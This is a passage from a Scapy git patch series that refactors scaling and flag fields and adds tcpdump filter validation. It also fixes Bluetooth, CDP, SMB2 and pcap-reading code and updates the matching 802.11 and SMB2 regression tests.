self.fmt[-1] != "f": + x = round(x, self.ndigits) + return x + + def any2i(self, pkt, x): + if isinstance(x, (str, bytes)): + x = struct.unpack(self.fmt, bytes_encode(x))[0] + x = self.m2i(pkt, x) + return x + + def i2repr(self, pkt, x): + return "%s %s" % (self.i2h(pkt, x), self.unit) + + def randval(self): + value = super(_ScalingField, self).randval() + if value is not None: + min_val = round(value.min * self.scaling + self.offset, + self.ndigits) + max_val = round(value.max * self.scaling + self.offset, + self.ndigits) + + return RandFloat(min(min_val, max_val), max(min_val, max_val)) + + +class ScalingField(_ScalingField, Field): """ Handle physical values which are scaled and/or offset for communication Example: @@ -2442,48 +2530,15 @@ class ScalingField(Field): :param ndigits: number of fractional digits for the internal conversion :param fmt: struct.pack format used to parse and serialize the internal value from and to machine representation # noqa: E501 """ - __slots__ = ["scaling", "unit", "offset", "ndigits"] - - def __init__(self, name, default, scaling=1, unit="", - offset=0, ndigits=3, fmt="B"): - self.scaling = scaling - self.unit = unit - self.offset = offset - self.ndigits = ndigits - Field.__init__(self, name, default, fmt) - - def i2m(self, pkt, x): - if x is None: - x = 0 - x = (x - self.offset) / self.scaling - if isinstance(x, float) and self.fmt[-1] != "f": - x = int(round(x)) - return x - def m2i(self, pkt, x): - x = x * self.scaling + self.offset - if isinstance(x, float) and self.fmt[-1] != "f": - x = round(x, self.ndigits) - return x - def any2i(self, pkt, x): - if isinstance(x, (str, bytes)): - x = struct.unpack(self.fmt, bytes_encode(x))[0] - x = self.m2i(pkt, x) - return x - - def i2repr(self, pkt, x): - return "%s %s" % (self.i2h(pkt, x), self.unit) - - def randval(self): - value = super(ScalingField, self).randval() - if value is not None: - min_val = round(value.min * self.scaling + self.offset, - self.ndigits) - max_val = round(value.max * self.scaling + self.offset, - self.ndigits) - - return RandFloat(min(min_val, max_val), max(min_val, max_val)) +class BitScalingField(_ScalingField, BitField): + """ + A ScalingField that is a BitField + """ + def __init__(self, name, default, size, *args, **kwargs): + _ScalingField.__init__(self, name, default, *args, **kwargs) + BitField.__init__(self, name, default, size) class UUIDField(Field): diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index aea58a9157b..b5440e36dc0 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -201,27 +201,16 @@ def mysummary(self): class HCI_ACL_Hdr(Packet): name = "HCI ACL header" - # NOTE: the 2-bytes entity formed by the 2 flags + handle must be LE - # This means that we must reverse those two bytes manually (we don't have - # a field that can reverse a group of fields) - fields_desc = [BitField("BC", 0, 2), # ] - BitField("PB", 0, 2), # ]=> 2 bytes - BitField("handle", 0, 12), # ] + fields_desc = [BitField("BC", 0, 2, tot_size=-2), + BitField("PB", 0, 2), + BitField("handle", 0, 12, end_tot_size=-2), LEShortField("len", None), ] - def pre_dissect(self, s): - return s[:2][::-1] + s[2:] # Reverse the 2 first bytes - - def post_dissect(self, s): - self.raw_packet_cache = None # Reset packet to allow post_build - return s - def post_build(self, p, pay): p += pay if self.len is None: p = p[:2] + struct.pack(" 00:00:00:00:00:00' +p.mysummary() == '802.11 Management Association Request 00:00:00:00:00:00 > 00:00:00:00:00:00' = Dot11QoS - build s = raw(Dot11()/Dot11QoS(Ack_Policy=1)) @@ -12106,7 +12106,7 @@ assert Dot11Elt(ID=1).mysummary() == "" assert Dot11(b'\x84\x00\x00\x00\x00\x11\x22\x33\x44\x55\x00\x11\x22\x33\x44\x55').addr2 == '00:11:22:33:44:55' = Multiple Dot11Elt layers -pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID="Rates") / Dot11Elt(ID="SSID", info="Scapy") +pkt = Dot11() / Dot11Beacon() / Dot11Elt(ID="Supported Rates") / Dot11Elt(ID="SSID", info="Scapy") assert pkt[Dot11Elt::{"ID": 0}].info == b"Scapy" assert pkt.getlayer(Dot11Elt, ID=0).info == b"Scapy" @@ -12173,7 +12173,7 @@ nstats assert nstats == { 'channel': 8, 'crypto': {'WPA2/PSK'}, - 'rates': [130, 132, 12, 18, 24, 36, 48, 72, 96, 108], + 'rates': [1.0, 2.0, 6.0, 9.0, 12.0, 18.0, 24.0, 36.0, 48.0, 54.0], 'ssid': 'SSID76', 'country': 'US', 'country_desc_type': 'Indoor' @@ -12185,7 +12185,7 @@ nstats = pkt[Dot11Beacon].network_stats() nstats assert nstats == { 'ssid': 'WPA3-Network', - 'rates': [130, 132, 139, 150, 12, 18, 24, 36], + 'rates': [1.0, 2.0, 5.5, 11.0, 6.0, 9.0, 12.0, 18.0, 24.0, 36.0, 48.0, 54.0], 'channel': 1, 'crypto': {'WPA3/SAE'} } @@ -12248,9 +12248,10 @@ assert Dot11Elt in rsn_ie pkt = RadioTap(b"\x00\x000\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x00\x00\x00\x00\x0bpin;%\xedN\x10\x0cl\t\xc0\x00\xce\x00\x00\x00\xb2\x00\xbd\x01\xce\x02\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\xec\x17/\x82\x1e)\xec\x17/\x82\x1e)\x10p\x81a\xa1\x08\x00\x00\x00\x00d\x001\x04\x00\rROUTE-821E295\x01\x01\x8c\x03\x01\x01\x05\x04\x00\x02\x00\x00\x07$IL \x01\x01\x14\x02\x01\x14\x03\x01\x14\x04\x01\x14\x05\x01\x14\x06\x01\x14\x07\x01\x14\x08\x01\x14\t\x01\x14\n\x01\x14\x0b\x01\x14;\x12QQRSTstuvwxyz{}~\x7f\x80*\x01\x000\x1a\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x8c\x00\x00\x00\x00\x0f\xac\x06-\x1a\x8d\x01\x1f\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x81\x00\x03\xa4\x00\x00'\xa4\x00\x00BT^\x00a2/\x00\x7f\x01\x04\xdd\x07\x00\xa0\xc6\x02\x02\x03\x00\xdd\x17\xec\x17/RRRRRRRRRRRRRRRRRRRRR\x9e[\xf2") assert Dot11EltRSN in pkt +pkt[Dot11Beacon].network_stats() assert pkt[Dot11Beacon].network_stats() == { 'ssid': 'ROUTE-821E295', - 'rates': [140], + 'rates': [6.0], 'channel': 1, 'country': 'IL', 'country_desc_type': None, @@ -12299,6 +12300,117 @@ assert f[Dot11EltMicrosoftWPA].pairwise_cipher_suites[0].cipher == 0x04 assert f[Dot11EltMicrosoftWPA].nb_akm_suites == 0x01 assert f[Dot11EltMicrosoftWPA].akm_suites[0].suite == 0x01 += HT Capabilities +f = RadioTap(b"\x00\x00&\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x9dt\xc3\xf1\x18\x00\x00\x00\x10\x02l\t\xa0\x00\xd9\x00\x00\x00\xd3\x00\xd7\x01@\x00\x00\x00\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa\xff\xff\xff\xff\xff\xffP'\x00\x00\x01\x04\x02\x04\x0b\x162\x08\x0c\x12\x18$0H`l\x03\x01\x01-\x1a-@\x17\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x00\x00\x08\x04\x00\x00\x00@Y\xb7T\x13") +assert Dot11EltHTCapabilities in f +assert f.L_SIG_TXOP_Protection == 0 +assert f.Forty_Mhz_Intolerant == 1 +assert f.PSMP == 0 +assert f.DSSS_CCK == 0 +assert f.Max_A_MSDU == 0 +assert f.Delayed_BlockAck == 0 +assert f.Rx_STBC == 0 +assert f.Tx_STBC == 0 +assert f.Short_GI_40Mhz == 0 +assert f.Short_GI_20Mhz == 1 +assert f.Green_Field == 0 +assert f.SM_Power_Save == 3 +assert f.Supported_Channel_Width == 0 +assert f.LDPC_Coding_Capability == 1 +assert f.res == 0 +assert f.Min_MPDCU_Start_Spacing == 5 +assert f.Max_A_MPDU_Length_Exponent == 3 +assert f.TX_Unequal_Modulation == 0 +assert f.TX_Max_Spatial_Streams == 0 +assert f.TX_RX_MCS_Set_Not_Equal == 0 +assert f.TX_MCS_Set_Defined == 0 +assert f.RX_Highest_Supported_Data_Rate == 0 +assert f.RX_MSC_Bitmask == 255 +assert f.RD_Responder == 0 +assert f.HTC_HT_Support == 0 +assert f.MCS_Feedback == 0 +assert f.PCO_Transition_Time == 0 +assert f.PCO == 0 +assert f.Channel_Estimation_Capability == 0 +assert f.CSI_max_n_Rows_Beamformer_Supported == 0 +assert f.Compressed_Steering_n_Beamformer_Antennas_Supported == 0 +assert f.Noncompressed_Steering_n_Beamformer_Antennas_Supported == 0 +assert f.CSI_n_Beamformer_Antennas_Supported == 0 +assert f.Minimal_Grouping == 0 +assert f.Explicit_Compressed_Beamforming_Feedback == 0 +assert f.Explicit_Noncompressed_Beamforming_Feedback == 0 +assert f.Explicit_Transmit_Beamforming_CSI_Feedback == 0 +assert f.Explicit_Compressed_Steering == 0 +assert f.Explicit_Noncompressed_Steering == 0 +assert f.Explicit_CSI_Transmit_Beamforming == 0 +assert f.Calibration == 0 +assert f.Implicit_Trasmit_Beamforming == 0 +assert f.Transmit_NDP == 0 +assert f.Receive_NDP == 0 +assert f.Transmit_Staggered_Sounding == 0 +assert f.Receive_Staggered_Sounding == 0 +assert f.Implicit_Transmit_Beamforming_Receiving == 0 +assert f.ASEL == 0 + += HT Capabilities with fuzzed values +# Those were checked with Wireshark ! +f = RadioTap(b'\x00\x00\t\x00\x02\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1a\xecH\xbf\x85!\x02\xd0m\x91\xa8\xd9\xf0\xa9\xb8\x15\xae\x00\x00\x00,Y\x86\xb3H\xa7?Z\xd2\xa8\xc2') +assert Dot11EltHTCapabilities in f +assert f.L_SIG_TXOP_Protection == 0 +assert f.Forty_Mhz_Intolerant == 1 +assert f.PSMP == 0 +assert f.DSSS_CCK == 0 +assert f.Max_A_MSDU == 1 +assert f.Delayed_BlockAck == 0 +assert f.Rx_STBC == 0 +assert f.Tx_STBC == 1 +assert f.Short_GI_40Mhz == 1 +assert f.Short_GI_20Mhz == 1 +assert f.Green_Field == 0 +assert f.SM_Power_Save == 3 +assert f.Supported_Channel_Width == 0 +assert f.LDPC_Coding_Capability == 0 +assert f.res == 5 +assert f.Min_MPDCU_Start_Spacing == 7 +assert f.Max_A_MPDU_Length_Exponent == 3 +assert f.TX_Unequal_Modulation == 0 +assert f.TX_Max_Spatial_Streams == 3 +assert f.TX_RX_MCS_Set_Not_Equal == 1 +assert f.TX_MCS_Set_Defined == 0 +assert f.RX_Highest_Supported_Data_Rate == 440 +assert f.RX_MSC_Bitmask == 46944200869120244326789 +assert f.RD_Responder == 1 +assert f.HTC_HT_Support == 0 +assert f.MCS_Feedback == 1 +assert f.PCO_Transition_Time == 2 +assert f.PCO == 0 +assert f.Channel_Estimation_Capability == 0 +assert f.CSI_max_n_Rows_Beamformer_Supported == 3 +assert f.Compressed_Steering_n_Beamformer_Antennas_Supported == 2 +assert f.Noncompressed_Steering_n_Beamformer_Antennas_Supported == 2 +assert f.CSI_n_Beamformer_Antennas_Supported == 1 +assert f.Minimal_Grouping == 0 +assert f.Explicit_Compressed_Beamforming_Feedback == 1 +assert f.Explicit_Noncompressed_Beamforming_Feedback == 1 +assert f.Explicit_Transmit_Beamforming_CSI_Feedback == 2 +assert f.Explicit_Compressed_Steering == 0 +assert f.Explicit_Noncompressed_Steering == 1 +assert f.Explicit_CSI_Transmit_Beamforming == 1 +assert f.Calibration == 2 +assert f.Implicit_Trasmit_Beamforming == 0 +assert f.Transmit_NDP == 0 +assert f.Receive_NDP == 0 +assert f.Transmit_Staggered_Sounding == 1 +assert f.Receive_Staggered_Sounding == 1 +assert f.Implicit_Transmit_Beamforming_Receiving == 0 +assert f.ASEL.resTransmit_Sounding_PPDUs +assert f.ASEL.Receive_ASEL +assert f.ASEL.Antenna_Indices_Feedback +assert f.ASEL.Explicit_CSI_Feedback +assert f.ASEL.Explicit_CSI_Feedback_Based_Transmit_ASEL +assert f.ASEL.Antenna_Selection +assert f.ASEL == 63 + = Reassociation request f = Dot11(b' \x00:\x01@\xe3\xd6\x7f*\x00\x00\x10\x18\xa9l.@\xe3\xd6\x7f*\x00 \t1\x04\n\x00@\xe3\xd6\x7f*\x00\x00\x064.2.12\x01\x08\x82\x84\x0b\x16$0Hl!\x02\x08\x1a$\x02\x01\x0b0&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x112\x04\x0c\x12\x18`\x7f\x08\x01\x00\x00\x00\x00\x00\x00@\xdd\t\x00\x10\x18\x02\x00\x00\x10\x00\x00') assert Dot11EltRSN in f diff --git a/tox.ini b/tox.ini index 43cbf19ab35..62bc20b0f60 100644 --- a/tox.ini +++ b/tox.ini @@ -113,7 +113,7 @@ description = "Check code for Grammar mistakes" skip_install = true deps = codespell # inet6, dhcp6 and the ipynb files contains french: ignore them -commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*.ipynb,*.svg,*.gif,*.obs" scapy/ doc/ test/ .github/ +commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*.ipynb,*.svg,*.gif,*.obs,*.gz" scapy/ doc/ test/ .github/ [testenv:twine] From d9d76f6649415c0d423fc56a18454dd01c2f0e69 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 22 Jul 2020 15:42:48 +0200 Subject: [PATCH 0238/1632] Catch invalid filter in tcpdump() & PcapReader warn --- scapy/sendrecv.py | 7 ++++--- scapy/utils.py | 14 ++++++++++++-- test/regression.uts | 10 ++++++++++ 3 files changed, 26 insertions(+), 5 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 964cf2c192b..8216f6d8d83 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -855,12 +855,12 @@ def _run(self, all(isinstance(elt, str) for elt in offline): sniff_sockets.update((PcapReader( fname if flt is None else - tcpdump(fname, args=["-w", "-", flt], getfd=True) + tcpdump(fname, args=["-w", "-"], flt=flt, getfd=True) ), fname) for fname in offline) elif isinstance(offline, dict): sniff_sockets.update((PcapReader( fname if flt is None else - tcpdump(fname, args=["-w", "-", flt], getfd=True) + tcpdump(fname, args=["-w", "-"], flt=flt, getfd=True) ), label) for fname, label in six.iteritems(offline)) else: # Write Scapy Packet objects to a pcap file @@ -878,7 +878,8 @@ def _write_to_pcap(packets_list): sniff_sockets[PcapReader( offline if flt is None else tcpdump(offline, - args=["-w", "-", flt], + args=["-w", "-"], + flt=flt, getfd=True, quiet=quiet) )] = offline diff --git a/scapy/utils.py b/scapy/utils.py index be3b6343fda..d65711c701a 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -971,6 +971,10 @@ def __call__(cls, filename): """ i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) filename, fdesc, magic = cls.open(filename) + if not magic: + raise Scapy_Exception( + "No data could be read!" + ) try: i.__init__(filename, fdesc, magic) except Scapy_Exception: @@ -1626,7 +1630,7 @@ def _guess_linktype_value(name): @conf.commands.register -def tcpdump(pktlist=None, dump=False, getfd=False, args=None, +def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, prog=None, getproc=False, quiet=False, use_tempfile=None, read_stdin_opts=None, linktype=None, wait=True, _suppress=False): @@ -1654,7 +1658,7 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, Packet instances. Can also be a filename (as a string), an open file-like object that must be a file format readable by tshark (Pcap, PcapNg, etc.) or None (to sniff) - + :param flt: a filter to use with tcpdump :param dump: when set to True, returns a string instead of displaying it. :param getfd: when set to True, returns a file-like object to read data from tcpdump or tshark from. @@ -1756,6 +1760,12 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, # Make a copy of args args = list(args) + if flt is not None: + # Check the validity of the filter + from scapy.arch.common import compile_filter + compile_filter(flt) + args.append(flt) + stdout = subprocess.PIPE if dump or getfd else None stderr = open(os.devnull) if quiet else None proc = None diff --git a/test/regression.uts b/test/regression.uts index 20e8e7c1599..7f136a54c5d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7180,6 +7180,16 @@ assert(all(UDP in p for p in l)) l = sniff(offline=IP()/UDP(sport=(10000, 10001)), filter="tcp") assert len(l) == 0 += Check offline sniff() with Packets, tcpdump and a bad filter +~ tcpdump + +try: + sniff(offline=IP()/UDP(), filter="bad filter") +except Scapy_Exception: + pass +else: + assert False + = Check offline sniff with lfilter assert len(sniff(offline=[IP()/UDP(), IP()/TCP()], lfilter=lambda x: TCP in x)) == 1 From dff9ca1c42ec6d7308edb4ea54196601e110ec0d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 15 Jul 2020 18:09:37 +0000 Subject: [PATCH 0239/1632] Revert part of 2629 / FlagsField & SMB2 fixes --- scapy/fields.py | 39 +++++++++++++++++++++++----- scapy/layers/smb2.py | 62 +++++++++++++++++++++++++++----------------- test/fields.uts | 29 +++++++++++++++++++++ test/smb2.uts | 48 ---------------------------------- 4 files changed, 100 insertions(+), 78 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index f3022a09617..b51635760f0 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2152,27 +2152,54 @@ class FlagsField(BitField): Make sure all your flags have a label - Example: + Example (list): >>> from scapy.packet import Packet >>> class FlagsTest(Packet): fields_desc = [FlagsField("flags", 0, 8, ["f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7"])] # noqa: E501 >>> FlagsTest(flags=9).show2() ###[ FlagsTest ]### flags = f0+f3 - >>> FlagsTest(flags=0).show2().strip() + + Example (str): + >>> from scapy.packet import Packet + >>> class TCPTest(Packet): + fields_desc = [ + BitField("reserved", 0, 7), + FlagsField("flags", 0x2, 9, "FSRPAUECN") + ] + >>> TCPTest(flags=3).show2() ###[ FlagsTest ]### - flags = + reserved = 0 + flags = FS + + Example (dict): + >>> from scapy.packet import Packet + >>> class FlagsTest2(Packet): + fields_desc = [ + FlagsField("flags", 0x2, 16, { + 1: "1", # 1st bit + 8: "2" # 8th bit + }) + ] :param name: field's name :param default: default value for the field :param size: number of bits in the field (in bits) - :param names: (list or dict) label for each flag, Least Significant Bit tag's name is written first # noqa: E501 + :param names: (list or str or dict) label for each flag + If it's a str or a list, the least Significant Bit tag's name + is written first. """ ismutable = True - __slots__ = ["multi", "names"] + __slots__ = ["names"] def __init__(self, name, default, size, names): - self.multi = isinstance(names, list) + # Convert the dict to a list + if isinstance(names, dict): + tmp = ["bit_%d" % i for i in range(size)] + for i, v in six.viewitems(names): + tmp[i] = v + names = tmp + # Store the names as str or list self.names = names BitField.__init__(self, name, default, size) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 4e5596969c2..6c5a4926f43 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -9,11 +9,30 @@ from scapy.config import conf from scapy.packet import Packet, bind_layers -from scapy.fields import StrFixedLenField, LEIntField, LEShortEnumField, \ - ShortEnumField, XLEIntField, LEShortField, FlagsField, LELongField, \ - XLELongField, XNBytesField, FieldLenField, IntField, FieldListField, \ - XStrLenField, ShortField, IntEnumField, StrFieldUtf16, XLEShortField, \ - UUIDField, XLongField, PacketListField, PadField +from scapy.fields import ( + FieldLenField, + FieldListField, + FlagsField, + IntEnumField, + IntField, + LEIntField, + LELongField, + LEShortEnumField, + LEShortField, + PacketListField, + PadField, + ShortEnumField, + ShortField, + StrFieldUtf16, + StrFixedLenField, + UUIDField, + XLEIntField, + XLELongField, + XLEShortField, + XLongField, + XNBytesField, + XStrLenField, +) # EnumField @@ -35,13 +54,13 @@ # FlagField SMB2_CAPABILITIES = { - 30: "CapabilitiesEncryption", - 29: "CapabilitiesDirectoryLeasing", - 28: "CapabilitiesPersistentHandles", - 27: "CapabilitiesMultiChannel", - 26: "CapabilitiesLargeMTU", - 25: "CapabilitiesLeasing", - 24: "CapabilitiesDFS", + 30: "Encryption", + 29: "DirectoryLeasing", + 28: "PersistentHandles", + 27: "MultiChannel", + 26: "LargeMTU", + 25: "Leasing", + 24: "DFS", } # EnumField @@ -76,6 +95,13 @@ class SMB2_Header(Packet): XNBytesField("Signature", 0, 16), ] + def guess_payload_class(self, payload): + if self.Command == 0x0000: + if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: + return SMB2_Negociate_Protocol_Response_Header + return SMB2_Negociate_Protocol_Request_Header + return super(SMB2_Header, self).guess_payload_class(payload) + class SMB2_Compression_Transform_Header(Packet): name = "SMB2 Compression Transform Header" @@ -270,18 +296,6 @@ class SMB2_Negociate_Protocol_Response_Header(Packet): bind_layers(SMB2_Encryption_Capabilities, conf.padding_layer) bind_layers(SMB2_Compression_Capabilities, conf.padding_layer) bind_layers(SMB2_Netname_Negociate_Context_ID, conf.padding_layer) -bind_layers( - SMB2_Header, - SMB2_Negociate_Protocol_Request_Header, - Command=0x0000, - Flags=lambda f: (f >> 24) & 1 == 0 -) -bind_layers( - SMB2_Header, - SMB2_Negociate_Protocol_Response_Header, - Command=0x0000, - Flags=lambda f: (f >> 24) & 1 == 1 -) bind_layers( SMB2_Negociate_Context, SMB2_Preauth_Integrity_Capabilities, diff --git a/test/fields.uts b/test/fields.uts index c281fe58809..9a93eaa2f24 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -1487,6 +1487,35 @@ assert "f2" in flags assert "f4" in flags assert "f0" in flags += FlagsField with str + +class TCPTest(Packet): + fields_desc = [ + BitField("reserved", 0, 7), + FlagsField("flags", 0x2, 9, "FSRPAUECN") + ] + +a = TCPTest(flags=3) +assert a.flags.F +assert a.flags.S +assert a.sprintf("%flags%") == "FS" + += FlagsField with dict + +class FlagsTest2(Packet): + fields_desc = [ + FlagsField("flags", 0x2, 16, { + 0: "A", # 0 bit + 7: "B" # 7 bit + }) + ] + +a = FlagsTest2(flags=255) +a.sprintf("%flags%") +assert a.flags.A +assert a.flags.B +assert a.sprintf("%flags%") == "A+bit_1+bit_2+bit_3+bit_4+bit_5+bit_6+B" + ######## ######## diff --git a/test/smb2.uts b/test/smb2.uts index 11753841785..3d581fb59e7 100644 --- a/test/smb2.uts +++ b/test/smb2.uts @@ -1,7 +1,3 @@ -############ -############ -~ SMB2 - + SMB2 Header = SMB2 Header dissecting @@ -59,15 +55,6 @@ assert pkt[NBTSession].TYPE == 0x00 # session message smb2 = pkt[SMB2_Header] assert smb2.Start == b'\xfeSMB' - - - - - - - - - + SMB2 Negociate Procotol Request Header dissecting = Common fields in header @@ -146,28 +133,6 @@ assert netname.DataLength == 28 assert netname.NetName == '192.168.178.21' - - - - - - - - -+ test SMB2 Negociate Protocol Request Header - assembling - -pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Request_Header() -assert SMB2_Negociate_Protocol_Request_Header in pkt - - - - - - - - - - + SMB2 Negociate Protocol Response Header dissecting = Common fields in header @@ -229,16 +194,3 @@ assert comp.CompressionAlgorithmCount == 1 assert len(comp.CompressionAlgorithms) == 1 assert comp.CompressionAlgorithms[0] == 1 - - - - - - - - - -+ SMB2 Negociate Protocol Response Header assembling - -pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Response_Header() -assert SMB2_Negociate_Protocol_Response_Header in pkt From e6848ca7cf485eae7bb34abf3897999e03a5ef1c Mon Sep 17 00:00:00 2001 From: cq Date: Fri, 31 Jul 2020 17:58:24 +0800 Subject: [PATCH 0240/1632] fix len calculation for CDPMsgAddr --- scapy/contrib/cdp.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index 9a5e02e447d..208cdd161fc 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -195,8 +195,7 @@ class CDPMsgAddr(CDPMsgGeneric): def post_build(self, pkt, pay): if self.len is None: - tmp_len = 8 + len(self.addr) * 9 - pkt = pkt[:2] + struct.pack("!H", tmp_len) + pkt[4:] + pkt = pkt[:2] + struct.pack("!H", len(pkt)) + pkt[4:] p = pkt + pay return p From b26cdcf0103c6533b491cb9b1725a84757a43cfe Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 1 Aug 2020 11:28:37 +0200 Subject: [PATCH 0241/1632] Fix #2742 --- scapy/utils.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index d65711c701a..756110c2e1a 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1127,7 +1127,8 @@ def __init__(self, filename, fdesc, magic): self.LLcls = conf.l2types[self.linktype] except KeyError: warning("PcapReader: unknown LL type [%i]/[%#x]. Using Raw packets" % (self.linktype, self.linktype)) # noqa: E501 - self.LLcls = conf.raw_layer + from scapy.packet import Raw + self.LLcls = conf.raw_layer or Raw def read_packet(self, size=MTU): rp = super(PcapReader, self).read_packet(size=size) @@ -1144,7 +1145,8 @@ def read_packet(self, size=MTU): from scapy.sendrecv import debug debug.crashed_on = (self.LLcls, s) raise - p = conf.raw_layer(s) + from scapy.packet import Raw + p = (conf.raw_layer or Raw)(s) power = Decimal(10) ** Decimal(-9 if self.nano else -6) p.time = EDecimal(pkt_info.sec + power * pkt_info.usec) p.wirelen = pkt_info.wirelen @@ -1325,7 +1327,8 @@ def read_packet(self, size=MTU): except Exception: if conf.debug_dissector: raise - p = conf.raw_layer(s) + from scapy.packet import Raw + p = (conf.raw_layer or Raw)(s) if tshigh is not None: p.time = EDecimal((tshigh << 32) + tslow) / tsresol p.wirelen = wirelen From fa604a487e25b618fb8472073476b5b643c0fce1 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sat, 1 Aug 2020 11:37:42 +0200 Subject: [PATCH 0242/1632] Hide "things to consider" --- .github/ISSUE_TEMPLATE.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md index 94f93347fb9..49b0e2f8c0a 100644 --- a/.github/ISSUE_TEMPLATE.md +++ b/.github/ISSUE_TEMPLATE.md @@ -1,4 +1,5 @@ -#### Things to consider + #### Brief description From 60471096c13ed939f36e57c953e2850086993b83 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 4 Aug 2020 21:43:44 +0200 Subject: [PATCH 0243/1632] Better fix & explanation --- scapy/utils.py | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 756110c2e1a..2c6232b803f 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1127,8 +1127,10 @@ def __init__(self, filename, fdesc, magic): self.LLcls = conf.l2types[self.linktype] except KeyError: warning("PcapReader: unknown LL type [%i]/[%#x]. Using Raw packets" % (self.linktype, self.linktype)) # noqa: E501 - from scapy.packet import Raw - self.LLcls = conf.raw_layer or Raw + if conf.raw_layer is None: + # conf.raw_layer is set on import + import scapy.packet # noqa: F401 + self.LLcls = conf.raw_layer def read_packet(self, size=MTU): rp = super(PcapReader, self).read_packet(size=size) @@ -1145,8 +1147,10 @@ def read_packet(self, size=MTU): from scapy.sendrecv import debug debug.crashed_on = (self.LLcls, s) raise - from scapy.packet import Raw - p = (conf.raw_layer or Raw)(s) + if conf.raw_layer is None: + # conf.raw_layer is set on import + import scapy.packet # noqa: F401 + p = conf.raw_layer(s) power = Decimal(10) ** Decimal(-9 if self.nano else -6) p.time = EDecimal(pkt_info.sec + power * pkt_info.usec) p.wirelen = pkt_info.wirelen @@ -1327,8 +1331,10 @@ def read_packet(self, size=MTU): except Exception: if conf.debug_dissector: raise - from scapy.packet import Raw - p = (conf.raw_layer or Raw)(s) + if conf.raw_layer is None: + # conf.raw_layer is set on import + import scapy.packet # noqa: F401 + p = conf.raw_layer(s) if tshigh is not None: p.time = EDecimal((tshigh << 32) + tslow) / tsresol p.wirelen = wirelen From 9a85fe834ca59fa6a1b7efcfd0d46eb240c0e4d4 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 7 Aug 2020 14:20:56 +0200 Subject: [PATCH 0244/1632] Re-add some minor SMB2 tets --- scapy/layers/smb2.py | 14 +++++++++++++- test/smb2.uts | 10 ++++++++++ 2 files changed, 23 insertions(+), 1 deletion(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 6c5a4926f43..d8308b53721 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -8,7 +8,7 @@ """ from scapy.config import conf -from scapy.packet import Packet, bind_layers +from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import ( FieldLenField, FieldListField, @@ -296,6 +296,18 @@ class SMB2_Negociate_Protocol_Response_Header(Packet): bind_layers(SMB2_Encryption_Capabilities, conf.padding_layer) bind_layers(SMB2_Compression_Capabilities, conf.padding_layer) bind_layers(SMB2_Netname_Negociate_Context_ID, conf.padding_layer) +bind_top_down( + SMB2_Header, + SMB2_Negociate_Protocol_Request_Header, + 